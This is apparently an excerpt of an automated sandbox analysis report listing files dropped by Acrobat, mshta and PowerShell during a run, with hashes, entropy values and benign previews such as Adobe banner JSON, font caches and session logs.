                                                        Preview:{"analyticsData":{"responseGUID":"9402cd12-0111-4b75-bb9a-0a41263c391a","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1735459381063,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):289
                                                        Entropy (8bit):5.2635100765488865
                                                        Encrypted:false
                                                        SSDEEP:6:YEQXJ2HXssVUTQI1PqU1UXjb24kF0YpUoAvJf8dPeUkwRe9:YvXKXx+TQmyU1UTbdiGU8Ukee9
                                                        MD5:0916632BEF6698D597B2A38B7D281898
                                                        SHA1:8B6D0A84A2DE03CB5215F51EDEBD9053A18502BE
                                                        SHA-256:213148C6EB8499CB003D642C6EE5E011DD14B842FC06FDC7448EA4442638C163
                                                        SHA-512:A14E3CD5DB15F95D1F2A191A83ED19883439ADEFD1987A81DB4EF81F6DE2BB624E4D9B2D0DD61A583A17709B08BC0CA3CED2D5368DD8B03841758A7D7392CD5C
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"9402cd12-0111-4b75-bb9a-0a41263c391a","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1735459381063,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):292
                                                        Entropy (8bit):5.267427821337732
                                                        Encrypted:false
                                                        SSDEEP:6:YEQXJ2HXssVUTQI1PqU1UXjb24kF0YpUoAvJfQ1rPeUkwRe9:YvXKXx+TQmyU1UTbdiGY16Ukee9
                                                        MD5:594C610DC19581E821E82E5567630090
                                                        SHA1:3DEF9983E93BA328B0099D86D452CDFA2DB0FA02
                                                        SHA-256:7300C7E8111A7B63EDF9971FD5B5566670B3D056F9FF947778C4379AB9026076
                                                        SHA-512:8ACC02D27C129672567CA3FC62D63F233D05600A28E3D74F5590693091D3B63935221CF4C5C84BBF36D61A55F505227588C79BB0B2906FC5DF9D8CAE263BDF7E
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"9402cd12-0111-4b75-bb9a-0a41263c391a","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1735459381063,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):289
                                                        Entropy (8bit):5.277056036125332
                                                        Encrypted:false
                                                        SSDEEP:6:YEQXJ2HXssVUTQI1PqU1UXjb24kF0YpUoAvJfFldPeUkwRe9:YvXKXx+TQmyU1UTbdiGz8Ukee9
                                                        MD5:03E73265ACD92D7B483C0B2AF663ABBD
                                                        SHA1:8E310815C6FD7C0130079A07C9030A2E472D7169
                                                        SHA-256:ECFCBD788CE19C96C2C641621B34BB8498A92C503D671530EDB765DE94697EF1
                                                        SHA-512:CC26196307F6F9CB2788949B92539929BB6769BF542458F2492E146E64467F4D0C4BCD6E917BCE2A73DEE2E8CD2750662D025EC45824FCB168743F581C8BF31A
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"9402cd12-0111-4b75-bb9a-0a41263c391a","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1735459381063,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):295
                                                        Entropy (8bit):5.290706162984914
                                                        Encrypted:false
                                                        SSDEEP:6:YEQXJ2HXssVUTQI1PqU1UXjb24kF0YpUoAvJfzdPeUkwRe9:YvXKXx+TQmyU1UTbdiGb8Ukee9
                                                        MD5:F149647B2BAA0FC766B201B0CC7F618C
                                                        SHA1:BED20314A592DD8C2968DF8890B20B13350475FA
                                                        SHA-256:0041C2DBFBBF74F31CC72760B60A242A5B0F55600A7B7A1323EC695622854E34
                                                        SHA-512:41255DC34206BF81AC7952DAF6D818B879854499E59F0D9C76F4DF8F67265CF31343FC4470BF4CE86CF5E91F7EC864E11F27DF1723AA5FD6B24E63E6D2869127
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"9402cd12-0111-4b75-bb9a-0a41263c391a","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1735459381063,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):289
                                                        Entropy (8bit):5.27103241875915
                                                        Encrypted:false
                                                        SSDEEP:6:YEQXJ2HXssVUTQI1PqU1UXjb24kF0YpUoAvJfYdPeUkwRe9:YvXKXx+TQmyU1UTbdiGg8Ukee9
                                                        MD5:45EDF5B933AC26B49746A3EF4D718F62
                                                        SHA1:96269296DA84CBD5925D5B3232191E26A0CD1DEB
                                                        SHA-256:BBD0F079C7B4E45060B0B76B1ED91DF9A9E732E752B9CE9F88564B8C2642C940
                                                        SHA-512:0B8DCBFCC1698A25B78E1A211E78336908EE7AD288C0578312E81B39F1D68878E97D0C0CB2D91E8F3F5F178492C72EA311304E7A90BE1D071EC06A2A6A3A80AB
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"9402cd12-0111-4b75-bb9a-0a41263c391a","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1735459381063,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):284
                                                        Entropy (8bit):5.256255097421502
                                                        Encrypted:false
                                                        SSDEEP:6:YEQXJ2HXssVUTQI1PqU1UXjb24kF0YpUoAvJf+dPeUkwRe9:YvXKXx+TQmyU1UTbdiG28Ukee9
                                                        MD5:EDDD59760EEE06A279898ABF1D284B8E
                                                        SHA1:75B6E399901FD498EFF6967DD3F826608196F39E
                                                        SHA-256:12E08E2AD9B20F339ABA7176563DB0729D9EA99446A7504CC9C3BD3E3F6FB350
                                                        SHA-512:423E106704856F3582C7BD8228B93C1DBF2DE19EA2CDDCC7BC39FD211EE7C6094471019BC619D559CBF6EC1F89AC71D1F3871B75C9DF943A8A5A723BB99D61A1
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"9402cd12-0111-4b75-bb9a-0a41263c391a","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1735459381063,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):291
                                                        Entropy (8bit):5.254778606338449
                                                        Encrypted:false
                                                        SSDEEP:6:YEQXJ2HXssVUTQI1PqU1UXjb24kF0YpUoAvJfbPtdPeUkwRe9:YvXKXx+TQmyU1UTbdiGDV8Ukee9
                                                        MD5:44BED773EEBDC07843527C82A2CBE3C0
                                                        SHA1:6ACEEB109F2933398271663E7C998B958D8F3506
                                                        SHA-256:26978FCBD143D299542279E168D6E9CC80A94DB3876D9DC8805ABCF1E384FE8B
                                                        SHA-512:7923DD3EC5E2A3D20A6DD9C797DA10E0C7778199D8012453B897F9ED49406196D3D1A85383B403020CB4DA132D02C8BC1161F894B45911EC64F75D12A7A4A9CB
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"9402cd12-0111-4b75-bb9a-0a41263c391a","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1735459381063,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):287
                                                        Entropy (8bit):5.258054837655887
                                                        Encrypted:false
                                                        SSDEEP:6:YEQXJ2HXssVUTQI1PqU1UXjb24kF0YpUoAvJf21rPeUkwRe9:YvXKXx+TQmyU1UTbdiG+16Ukee9
                                                        MD5:217D8C424E8C1F9B2A4EBD920E358C4F
                                                        SHA1:C782410AE6D904018AA8839866BA58AA4377E79F
                                                        SHA-256:6C21E4A25426B7E23EEF85798BD5723309E647E5EE5813743E42ABFDBF5F55FD
                                                        SHA-512:1527C10CAD47F1F6CE340484675DD9B75B67540E16C4999D7C6C123DB873834021A088AA8BE9C79E0A3A698DBE5DBF275963FA5DA3E76E2AFFCF80F6D84B0C95
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"9402cd12-0111-4b75-bb9a-0a41263c391a","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1735459381063,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):1090
                                                        Entropy (8bit):5.655251195936669
                                                        Encrypted:false
                                                        SSDEEP:24:Yv6Xx+TQmyCUXpamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSO:Yv0W7Vw1BgkDMUJUAh8cvMO
                                                        MD5:9C50DE23EA7D885DA6C98AE8E8FC68E8
                                                        SHA1:2580A8F81BCFA1A11F94E271A4E4117190F8C701
                                                        SHA-256:C5812018EA45A2712DBE9D6077BCAA0B8AEFC3D1C8C7F3EC52B6F582C48C94E2
                                                        SHA-512:EB931B0106E93A7902974E8E54DBDD08E71556C2755B461A62472FE226621FFDD719104A12B6FA7A8F7F8F6AF134FB051AE977BD575E896D9F9A3F4BB68880DE
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"9402cd12-0111-4b75-bb9a-0a41263c391a","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1735459381063,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):286
                                                        Entropy (8bit):5.23369721951234
                                                        Encrypted:false
                                                        SSDEEP:6:YEQXJ2HXssVUTQI1PqU1UXjb24kF0YpUoAvJfshHHrPeUkwRe9:YvXKXx+TQmyU1UTbdiGUUUkee9
                                                        MD5:58C626C0111CAED9E6A296F698B20AAC
                                                        SHA1:C6B11AB08C2C03DFEF264343B6C1CD25E77130B1
                                                        SHA-256:B9C926DA4A9CE29D87C03B9C5CA893E7FCDF50B0C8BE6330A514C05B395A70AA
                                                        SHA-512:2FAEED844E2A6CE40916211D50B66435C0B2FED10E418BD2B1DB59E9A6679D73378053CC320E684CE7285A3152FACE9AC2B55A14E15A17417D996F7C57A16C13
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"9402cd12-0111-4b75-bb9a-0a41263c391a","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1735459381063,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):282
                                                        Entropy (8bit):5.239257108698361
                                                        Encrypted:false
                                                        SSDEEP:6:YEQXJ2HXssVUTQI1PqU1UXjb24kF0YpUoAvJTqgFCrPeUkwRe9:YvXKXx+TQmyU1UTbdiGTq16Ukee9
                                                        MD5:CA2601C2812297D91B52F1DC4804E57E
                                                        SHA1:E289F90F9F5CD112DE65DF4D2030F30A70CEA44B
                                                        SHA-256:C5FFC0A8EE09D05B5AD54B523DFC6996120234A1DF5EE563D8FD05D03FB6AAEF
                                                        SHA-512:AA6242E4A2BF70F33509767BE125C2593E6C4BD4CC515803676B20ED6763AF9CFCA93BAF082C94E9A5E7D4FC257C8BF0B986009E7C136F6A3BD789179DD3846E
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"9402cd12-0111-4b75-bb9a-0a41263c391a","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1735459381063,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):4
                                                        Entropy (8bit):0.8112781244591328
                                                        Encrypted:false
                                                        SSDEEP:3:e:e
                                                        MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                        SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                        SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                        SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                        Malicious:false
                                                        Preview:....
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):2814
                                                        Entropy (8bit):5.141813283752691
                                                        Encrypted:false
                                                        SSDEEP:24:YyJ6aIUp7Tay8CPHzqEKGxKEAplnDI+jLj0SKUsY4/S2x2LSkC0FA6pR5FYEu81L:YtUxRTLKGYEOXnBsPKEizFA6TrLugh9T
                                                        MD5:1F1E7B3801A479CE7F5B3C3512837E26
                                                        SHA1:6BF89F59B1E7B1D328A343BDA33E73F75F104CE6
                                                        SHA-256:18F9B3E5EC12D8A9DDEF69482AA07889741928743533054FC257BCDBD731480E
                                                        SHA-512:D933021EE1A9AAFE3F4E0AF96001C410D0D88DA66DE7EF4555FCA45D2B7805B143A7FB09EC10E66E0576944CEF1BA3E457C2CE2B16B87FEC6FE3BC0977ADF723
                                                        Malicious:false
                                                        Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"c4a6c1b6626e68c52f7b25e9b98bd3ed","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1735285680000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"798ccbc641eb0a150249ad39ef1f662f","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1735285680000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"3742916b9b5427049c17ebd71cdd9c20","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1735285680000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"730ed77b54d5c2f514d097c587e34b7e","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1735285680000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"e018697985d559c490d2c08421b94fa8","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1735285680000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"5b2ad65b64f092d0b6d0a116aa312470","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                        Category:dropped
                                                        Size (bytes):12288
                                                        Entropy (8bit):1.3199179711576665
                                                        Encrypted:false
                                                        SSDEEP:24:TLKufx/XYKQvGJF7urs9O3KaiZ3FL63FLesb+sZobF16R6FdpqpQ6YeoGJQFL+E4:TGufl2GL7msUKB0M0+Tb608YZsrhz
                                                        MD5:DF5D20BFF686F19AF25320253350D5AB
                                                        SHA1:F1FA88F13643851910210F90AA37CBE8456CC888
                                                        SHA-256:20B70CA1C6CE23E55B36C9D0D533C3756B7EDA36E571C80110F9336F3A18C844
                                                        SHA-512:CC10D2030EF5233E7BECCCED3D3BBEF60DD5F02AC7DB8B8FA4DF15A1B78AB7AC96FB9B8730A11BA28979A0694434972420D6B6E2F6F4927A2D12BD55AA0E414B
                                                        Malicious:false
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:SQLite Rollback Journal
                                                        Category:dropped
                                                        Size (bytes):8720
                                                        Entropy (8bit):1.7821383929031762
                                                        Encrypted:false
                                                        SSDEEP:48:7MbUKB0M0+Tb608YZBrGKKcqFl2GL7msK:7sFb608YZHKcKVmsK
                                                        MD5:9E6CB202DB21A1EFAC6B1183492BC2E2
                                                        SHA1:D1D6D78A8D44BD3EF97F10EDEBB27C33078206F8
                                                        SHA-256:F3149650C2D9F04167267BF567BC90118B63533CA6B6E8FE280078A7B318183D
                                                        SHA-512:4A205AF478079EC2B73F7E12B3487E351A11677285A3CAEBB63021C50B946BE8B385221E3E257D6F5D3DCB30E70C5B85356E8622A2568EC4D33423BFE0C96178
                                                        Malicious:false
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):66726
                                                        Entropy (8bit):5.392739213842091
                                                        Encrypted:false
                                                        SSDEEP:768:RNOpblrU6TBH44ADKZEg/xCSaGogDoiVwR4sAM4a0UglYyu:6a6TZ44ADE/MGjDoiV6TglK
                                                        MD5:86CD68D6081340D7B1CA34C7690FE315
                                                        SHA1:8944A42AB7FA4463040B2BE53F72A83DD0B4CFED
                                                        SHA-256:88D5ED4758529FC5EE8A1B64520A9B6D8273C6888B6DB169509230F693FD473C
                                                        SHA-512:2336B48528A467B5FEDAC758D0EDAE971DBE05DD711AC45EAC0897B9716CC93FE02E5C35C05ECE53A5D960D43DA670E93966D6BB51BECC9222711FE6CB8ADE0D
                                                        Malicious:false
                                                        Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                        Process:C:\Windows\System32\mshta.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):497355
                                                        Entropy (8bit):6.2697576364001515
                                                        Encrypted:false
                                                        SSDEEP:6144:YUT2/hKdAxeNSYneIelFeYU3+ejQdefeFdAepSjUbeXeTkeMe/:v0hKq
                                                        MD5:CB3ECBABD5A956664E03CBE4270418C6
                                                        SHA1:6B7915B233B5E30C8B6ACA23013735A9F33DDA3F
                                                        SHA-256:9355A7BC59AF4AB0AE04ABE2EAE7984BCEDE654F5E46302686F381E678D20615
                                                        SHA-512:53AEEB6F6AF1BF767FF6C303DB786B91BA0B4A8F8DFCAFF44935FE8F5642D594ACA39BBC8229B8971C033A158BFE0880541CA158EEB88BF29BE2CCE1AAA0947C
                                                        Malicious:false
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:modified
                                                        Size (bytes):11887
                                                        Entropy (8bit):4.901437212034066
                                                        Encrypted:false
                                                        SSDEEP:192:Zxoe5qpOZxoe54ib4ZVsm5emdR2Ca6pZlbjvwRjdHPRhAgkjDt4iWN3yBGHVQ9sY:Srib4ZoopbjvwRjdvRNkjh4iUxsNYW6m
                                                        MD5:DDAC12D6036E986FE7B5A5E062A8CC14
                                                        SHA1:FA891410075C9E647754E894CDCB14751FE9E3C7
                                                        SHA-256:B3B4B4AF761334818B7924740A84E55CE8ECA480F13077854469E8D9C7C1DF7E
                                                        SHA-512:F7BD65E3B361D0F02B541273A6D99BD1F6B438F2304D4F061C262164166E4FAB6F56614CFD1C44A0D99C9E1A1B46D5DF0138A4656F96B7390162F54E1679B776
                                                        Malicious:false
                                                        Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):64
                                                        Entropy (8bit):0.34726597513537405
                                                        Encrypted:false
                                                        SSDEEP:3:Nlll:Nll
                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                        Malicious:false
                                                        Preview:@...e...........................................................
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):246
                                                        Entropy (8bit):3.5004142083842487
                                                        Encrypted:false
                                                        SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K87/G:Qw946cPbiOxDlbYnuRKF
                                                        MD5:80EB66D70CC7C0FBA6F95AF773144C26
                                                        SHA1:96864BEED0A7960851FDD226C7885F5DA8E573CD
                                                        SHA-256:42349F4AAC6CAA219FCCDF74A26548BFDD265466DC7769E1D573F7188D82ECE3
                                                        SHA-512:8F668BCC82246023C220D10541CC34F9320CBDB9742035C3C6A175A23BF2DFDDCCF5515E20334FB110372DED17A7F0A749F858683BDD55A92A68F953998DC7C7
                                                        Malicious:false
                                                        Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.7./.1.2./.2.0.2.4. . .0.2.:.4.7.:.5.7. .=.=.=.....
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:ASCII text, with very long lines (393)
                                                        Category:dropped
                                                        Size (bytes):16525
                                                        Entropy (8bit):5.361022727805069
                                                        Encrypted:false
                                                        SSDEEP:384:cBD67lQV4j1MOuD/btX+wknz+fzTqyorqz3tVFr84AbAYpfFWbWt+Fjwn0z5O+Wf:4M5
                                                        MD5:70A2D078BEFD5E910EE035832171B399
                                                        SHA1:1AB91914ECD7852E512C73437D30013594A16FB0
                                                        SHA-256:2B55DE84E5446FD295128DAD5827122E98AC784F96A1F422B711B14E8F7DB1ED
                                                        SHA-512:9FF36D4E320A8791AB0B87F24CAB4CBE777D9E8A3A64D26AF419132CDFDFCCD9A253EE9854032C4C87C546187951077F869CBCBDC9513278C557FC4895C7DBBC
                                                        Malicious:false
                                                        Preview:SessionID=1936179e-ff16-44f8-b471-8d99801d7fe3.1696501837158 Timestamp=2023-10-05T12:30:37:158+0200 ThreadID=4884 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=1936179e-ff16-44f8-b471-8d99801d7fe3.1696501837158 Timestamp=2023-10-05T12:30:37:159+0200 ThreadID=4884 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=1936179e-ff16-44f8-b471-8d99801d7fe3.1696501837158 Timestamp=2023-10-05T12:30:37:159+0200 ThreadID=4884 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=1936179e-ff16-44f8-b471-8d99801d7fe3.1696501837158 Timestamp=2023-10-05T12:30:37:159+0200 ThreadID=4884 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=1936179e-ff16-44f8-b471-8d99801d7fe3.1696501837158 Timestamp=2023-10-05T12:30:37:159+0200 ThreadID=4884 Component=ngl-lib_NglAppLib Description="SetConfig:
